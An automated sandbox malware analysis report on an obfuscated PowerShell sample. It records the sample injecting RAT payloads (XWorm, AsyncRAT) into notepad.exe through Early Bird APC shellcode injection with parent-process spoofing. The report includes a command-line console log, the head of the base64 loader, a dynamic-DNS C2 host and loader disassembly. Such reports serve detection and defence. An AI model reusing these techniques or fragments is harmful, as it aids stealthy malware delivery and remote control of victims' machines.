              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              quark.ps15%ReversingLabsScript.Trojan.Generic
              quark.ps17%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              jdokds.duckdns.org5%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              jdokds.duckdns.orgtrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://github.com/DARKNOSY/Rush-PowerShell-Obfuscatorquark.ps1false
                		high
                https://aka.ms/pscore68powershell.exe, 00000000.00000002.2888967329.0000022400001000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2888967329.0000022400001000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    No contacted IP infos

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1429328
                    Start date and time:2024-04-21 23:26:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 17s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:quark.ps1
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winPS1@4/10@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 12
                    • Number of non-executed functions: 3
                    Cookbook Comments:
                    • Found application associated with file extension: .ps1

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • Report size getting too big, too many NtWriteVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    23:27:13API Interceptor58x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\notepad.exe.log

                    Download File
                    Process:C:\Windows\System32\notepad.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):654
                    Entropy (8bit):5.380476433908377
                    Encrypted:false
                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):9434
                    Entropy (8bit):4.9243637703272345
                    Encrypted:false
                    SSDEEP:192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
                    MD5:EF4099FCAB6D29945272316889156337
                    SHA1:5AAFAD4581D21179B892604BEBD6038792F8CBD6
                    SHA-256:A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
                    SHA-512:EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):1.1940658735648508
                    Encrypted:false
                    SSDEEP:3:Nlllul774/lL:NllUwt
                    MD5:3BD40D4BDD7802424FE8F2DC2A41C196
                    SHA1:88F355EA9D58C5A00B2EBB0DC3127C0C13052631
                    SHA-256:FCF55501F03C9B5E24796B8FE3656143E97D7A5FD0300387C1960C226C74076A
                    SHA-512:67734D54D327379C259DB7E0576BE2A4B597CB2F0B9E881AA1FC2B55F375BB5862122579B0B5EC7DED7A7875C2AC7668033355772CBB8311A8A86924153D59B2
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:@...e................................................@..........

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igiqhzjc.zdy.ps1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_julg0pxn.imr.psm1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofgf04im.lcz.psm1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zphazezq.yoc.ps1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):6222
                    Entropy (8bit):3.7043053775447103
                    Encrypted:false
                    SSDEEP:48:PL1b3UCwbU2K+PsukvhkvklCyw3n2vEoYkolzySogZoKPEoYkolWySogZo+1:pjUCVolkvhkvCCtBoYkoVHgoYkoGH1
                    MD5:A98532F4187D385C2FBF11A37906FD5F
                    SHA1:EE177E8EDADFB8D18FE1EB2FDDAE95B0ACF28248
                    SHA-256:32A26D22832A53FE195E1F6CE106124C2BE2900CE33B6466F19053CC71CB3213
                    SHA-512:1E5715D486B3FEAA42D36A3D6A571E3CEA3320CE80041EFD7EE7A60C92C46F3F5138BA71994E51911B53CF325861CEA48CE36DE05A9CDF5980F86032DF8E50D1
                    Malicious:false
                    Preview:...................................FL..................F.".. ...d..........2...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......Po.2.....(.2.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XV.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......XX...Roaming.@......DWSl.XX.....C.....................1.}.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.XV.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.XV.....E......................?..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.XV.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.XV.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X\.....q...........

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DPXAHRKE5K5H2J21DYW2.temp

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):6222
                    Entropy (8bit):3.7043053775447103
                    Encrypted:false
                    SSDEEP:48:PL1b3UCwbU2K+PsukvhkvklCyw3n2vEoYkolzySogZoKPEoYkolWySogZo+1:pjUCVolkvhkvCCtBoYkoVHgoYkoGH1
                    MD5:A98532F4187D385C2FBF11A37906FD5F
                    SHA1:EE177E8EDADFB8D18FE1EB2FDDAE95B0ACF28248
                    SHA-256:32A26D22832A53FE195E1F6CE106124C2BE2900CE33B6466F19053CC71CB3213
                    SHA-512:1E5715D486B3FEAA42D36A3D6A571E3CEA3320CE80041EFD7EE7A60C92C46F3F5138BA71994E51911B53CF325861CEA48CE36DE05A9CDF5980F86032DF8E50D1
                    Malicious:false
                    Preview:...................................FL..................F.".. ...d..........2...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......Po.2.....(.2.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XV.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......XX...Roaming.@......DWSl.XX.....C.....................1.}.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.XV.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.XV.....E......................?..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.XV.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.XV.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X\.....q...........

                    \Device\ConDrv

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):753
                    Entropy (8bit):4.948874766338146
                    Encrypted:false
                    SSDEEP:12:NF+lDB5b/i7hV1cTi8QN+GISkvXQd2nWxktjXYHAWuOXQBP2axoE4Dsgkvmr6aAk:NF+lD7bK7Nwi8s+G7Ld2nXYTeBP26LCn
                    MD5:2DF1947099B4F659E022CFC0E82E70FB
                    SHA1:7A84EDFF0F461F78613DC8F84C38DE41D11D4C49
                    SHA-256:2AC099F27A15D64A8BD94FEB5D2743F32B70F11099FCA1E6020544AAF2773941
                    SHA-512:987585EC198CE1B7398377F46D9ECDEEF4BB322C3CA7FB72F6F6366BE417F68E779A697DBAE4025D0B6AC9606D455D1280EE10CE7F77665C5B043950DDBD6165
                    Malicious:false
                    Preview:[+] Launching a sacrificial process. [*] Spoofed parent process: explorer.exe (PID: 1028). [*] Spawned process: .C:\Windows\System32\notepad.exe (PID: 384)..[+] Injecting shellcode via Early Bird APC Queue. [*] Memory allocated. [-] Size: ..61440 bytes. [-] Address: ..0x0000028857430000. [-] Protection: .PAGE_READWRITE. [*] Payload decrypted and written. [-] Size: ..59648 bytes. [-] Address: ..0x0000028857430000. [*] Memory protection changed. [-] Protection: .PAGE_EXECUTE_READ. [*] APC queued. [-] Thread ID: ..6008. [*] Thread resumed. [*] Payload executed..[+] Closing opened handles. [*] Process Handle: .0x00000000000007F8. [*] Thread Handle: ..0x00000000000005AC.

                    Static File Info

                    General

                    File type:ASCII text, with very long lines (65346), with CRLF line terminators
                    Entropy (8bit):4.966291364701106
                    TrID:
                      File name:quark.ps1
                      File size:13'631'488 bytes
                      MD5:918d10fa6fd003a0bea73d2ba50538e0
                      SHA1:a089fbb17927d4a84d25e910b3d0cc7ea12faf1f
                      SHA256:4e842547867c928696600f51943bb9611adb9afc4741358fd5a97f28dcabfcf5
                      SHA512:a442521361cfdfd43f13250cb2b995a6e20713cf5559b504b2e3bc38ef12106a44f9e2eb279be200d73fa74559eeef7fa884d5dd2d85338dba846483290c1638
                      SSDEEP:24576:rWFjASpSiK44861Lh5Z5wt0WxLQ/qA31hC/v18Oa7OPgp6YxuYTj3bfQJ3gFKpLh:SyItZfFNKCIRqiEu54Hvp1jW1o96lj
                      TLSH:B0D6AE60BF945AF5EF8D1E3E906AAB1DC7F042172C32706BFA515F01B9DA146810B26F
                      File Content Preview:# Obfuscated using https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator, made by DARKN0$Y....$decodedScript = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(@"..IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9Sd

                      File Icon

                      Icon Hash:3270d6baae77db44

                      Network Behavior

                      No network behavior found

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:23:26:54
                      Start date:21/04/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1"
                      Imagebase:0x7ff7be880000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:1
                      Start time:23:26:54
                      Start date:21/04/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:23:27:27
                      Start date:21/04/2024
                      Path:C:\Windows\System32\notepad.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\notepad.exe
                      Imagebase:0x7ff69ecf0000
                      File size:201'216 bytes
                      MD5 hash:27F71B12CB585541885A31BE22F61C83
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:14.6%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:27.1%
                        Total number of Nodes:48
                        Total number of Limit Nodes:7
                        execution_graph 2039 28857439cb8 LoadLibraryA 2040 28857439cda 2039->2040 2041 28857439cd0 2039->2041 2040->2041 2042 28857439d0a VirtualProtect 2040->2042 2042->2041 2043 28857439d28 2042->2043 2044 28857439d36 VirtualProtect 2043->2044 2045 28857439d56 2044->2045 2045->2041 2046 28857439d71 VirtualProtect 2045->2046 2046->2041 2047 28857439d8a 2046->2047 2048 28857439d98 VirtualProtect 2047->2048 2048->2041 2049 2885743ab03 2050 2885743ab2a 2049->2050 2051 2885743ab65 VirtualAlloc 2050->2051 2055 2885743ab82 2050->2055 2052 2885743abae 2051->2052 2051->2055 2054 2885743ac67 LoadLibraryA 2052->2054 2052->2055 2056 2885743ac82 2052->2056 2063 2885743ae5a 2052->2063 2053 2885743af02 VirtualFree 2053->2055 2054->2052 2056->2063 2064 2885743ad36 2056->2064 2080 28857439cab 2056->2080 2058 2885743ad0c 2059 2885743ad10 2058->2059 2065 28857439dc3 LoadLibraryA 2058->2065 2059->2058 2059->2063 2063->2053 2064->2063 2075 2885743a8bb 2064->2075 2066 28857439df2 2065->2066 2067 28857439de8 2065->2067 2066->2067 2068 28857439e22 VirtualProtect 2066->2068 2067->2063 2067->2064 2068->2067 2069 28857439e40 2068->2069 2070 28857439e4e VirtualProtect 2069->2070 2071 28857439e6e 2070->2071 2071->2067 2072 28857439e89 VirtualProtect 2071->2072 2072->2067 2073 28857439ea2 2072->2073 2074 28857439eb0 VirtualProtect 2073->2074 2074->2067 2076 2885743a8fb CLRCreateInstance 2075->2076 2077 2885743a910 2075->2077 2076->2077 2078 2885743a9f5 SysAllocString 2077->2078 2079 2885743a9b9 2077->2079 2078->2079 2079->2063 2081 28857439cb8 LoadLibraryA 2080->2081 2082 28857439cd0 2081->2082 2083 28857439cda 2081->2083 2082->2058 2083->2082 2084 28857439d0a VirtualProtect 2083->2084 2084->2082 2085 28857439d28 2084->2085 2086 28857439d36 VirtualProtect 2085->2086 2087 28857439d56 2086->2087 2087->2082 2088 28857439d71 VirtualProtect 2087->2088 2088->2082 2089 28857439d8a 2088->2089 2090 28857439d98 VirtualProtect 2089->2090 2090->2082

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_000002885743CDCF 1 Function_000002885743E8C9 2 Function_000002885743BECB 3 Function_000002885743CDD7 4 Function_000002885743C2D7 5 Function_000002885743C4D3 6 Function_000002885743A7DB 91 Function_000002885743C313 6->91 7 Function_0000028857439EDB 18 Function_000002885743C2F7 7->18 19 Function_000002885743BDF7 7->19 108 Function_000002885743BF3F 7->108 8 Function_000002885743A4DB 9 Function_000002885743CDDF 10 Function_000002885743C6DF 11 Function_000002885743BADF 11->4 63 Function_000002885743A867 11->63 12 Function_00000288574300DF 13 Function_000002885743C6E4 14 Function_000002885743E3E6 15 Function_00007FF84900000B 16 Function_000002885743B7E3 16->8 16->18 17 Function_000002885743E3F5 19->2 19->18 20 Function_00007FF849000836 21 Function_000002885743E3FE 22 Function_000002885743CDFB 23 Function_000002885743AB03 23->4 23->7 23->16 23->18 23->19 41 Function_0000028857439CAB 23->41 45 Function_000002885743A8BB 23->45 49 Function_0000028857439DC3 23->49 56 Function_000002885743A35B 23->56 59 Function_000002885743B35B 23->59 60 Function_000002885743C05B 23->60 86 Function_000002885743BD83 23->86 93 Function_000002885743AF23 23->93 23->108 24 Function_00007FF849000B2D 61 Function_00007FF849000190 24->61 25 Function_0000028857430006 26 Function_000002885743CE03 27 Function_000002885743C78D 33 Function_000002885743E890 27->33 95 Function_000002885743E423 27->95 28 Function_000002885743C68F 29 Function_000002885743C694 43 Function_000002885743E8B4 29->43 30 Function_000002885743A193 30->19 31 Function_000002885743E595 32 Function_000002885743E696 70 Function_000002885743E86D 32->70 109 Function_000002885743E839 32->109 34 Function_000002885743C591 35 Function_000002885743D191 36 Function_000002885743A79B 37 Function_000002885743C29F 38 Function_000002885743C5A6 38->95 39 Function_000002885743DFA1 39->38 39->43 57 Function_000002885743C45C 39->57 69 Function_000002885743CE6D 39->69 87 Function_000002885743E408 39->87 40 Function_000002885743D1A1 41->4 42 Function_000002885743D1B4 42->1 44 Function_00007FF849000C5A 46 Function_000002885743A7BB 47 Function_0000028857439CB8 47->4 48 Function_00007FF849000270 75 Function_00007FF84900029E 48->75 49->4 50 Function_000002885743A7C7 51 Function_000002885743CDC0 52 Function_00007FF849000168 53 Function_000002885743D448 53->27 53->31 53->32 53->33 53->39 53->43 55 Function_000002885743D256 53->55 58 Function_000002885743C959 53->58 64 Function_000002885743DB60 53->64 78 Function_000002885743E470 53->78 79 Function_000002885743C873 53->79 99 Function_000002885743E42D 53->99 101 Function_000002885743CD2E 53->101 105 Function_000002885743D832 53->105 54 Function_000002885743C454 55->87 57->95 58->31 58->43 58->78 59->4 59->6 59->11 59->18 59->91 60->37 61->75 62 Function_000002885743E164 62->33 89 Function_000002885743D215 62->89 64->1 64->33 64->42 64->43 64->62 64->87 65 Function_000002885743C762 66 Function_00007FF849000589 66->52 96 Function_00007FF8490000C8 66->96 97 Function_00007FF8490001C8 66->97 67 Function_000002885743BD63 68 Function_00007FF849000188 69->87 69->95 70->109 71 Function_000002885743C76E 72 Function_000002885743BD6F 73 Function_00007FF849000CA2 74 Function_000002885743A473 76 Function_0000028857430171 77 Function_000002885743BD77 78->43 104 Function_000002885743E532 78->104 79->33 79->95 80 Function_000002885743C778 81 Function_000002885743D179 82 Function_000002885743C784 83 Function_000002885743A487 84 Function_000002885743CB82 84->78 85 Function_00007FF8490009A9 85->68 111 Function_00007FF8490001F0 85->111 86->30 88 Function_000002885743D108 90 Function_000002885743A415 92 Function_00007FF8490001D3 92->75 94 Function_00007FF8490000CD 102 Function_000002885743E428 95->102 97->75 98 Function_000002885743A72B 99->84 100 Function_000002885743CE2D 103 Function_000002885743A437 105->87 106 Function_000002885743C532 107 Function_000002885743C333 107->53 107->95 107->99 110 Function_00007FF8490001F2 110->75 111->75 112 Function_000002885743C445 113 Function_000002885743C547 114 Function_000002885743CE47 115 Function_000002885743C542

                        Executed Functions

                        Function 000002885743AB03 Relevance: 4.9, APIs: 3, Instructions: 406memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 34 2885743ab03-2885743ab59 call 2885743bd83 * 3 41 2885743ab5b-2885743ab5e 34->41 42 2885743ab90 34->42 41->42 43 2885743ab60-2885743ab63 41->43 44 2885743ab93-2885743abad 42->44 43->42 45 2885743ab65-2885743ab80 VirtualAlloc 43->45 46 2885743abae-2885743abd9 call 2885743c2d7 call 2885743c2f7 45->46 47 2885743ab82-2885743ab89 45->47 53 2885743abdb-2885743ac10 call 2885743bf3f call 2885743bdf7 46->53 54 2885743ac16-2885743ac2d call 2885743bd83 46->54 47->42 48 2885743ab8b-2885743ab8d 47->48 48->42 53->54 63 2885743aead-2885743aeb9 53->63 54->42 60 2885743ac33-2885743ac34 54->60 62 2885743ac3a-2885743ac40 60->62 64 2885743ac82-2885743ac8c 62->64 65 2885743ac42 62->65 69 2885743aebb-2885743aec5 63->69 70 2885743aeef-2885743af13 call 2885743c2f7 VirtualFree 63->70 66 2885743acba-2885743acc3 64->66 67 2885743ac8e-2885743aca9 call 2885743bd83 64->67 68 2885743ac44-2885743ac46 65->68 73 2885743acde-2885743ace1 66->73 74 2885743acc5-2885743accf call 28857439edb 66->74 67->63 86 2885743acaf-2885743acb8 67->86 75 2885743ac48-2885743ac4e 68->75 76 2885743ac63-2885743ac65 68->76 69->70 77 2885743aec7-2885743aee8 call 2885743c2f7 69->77 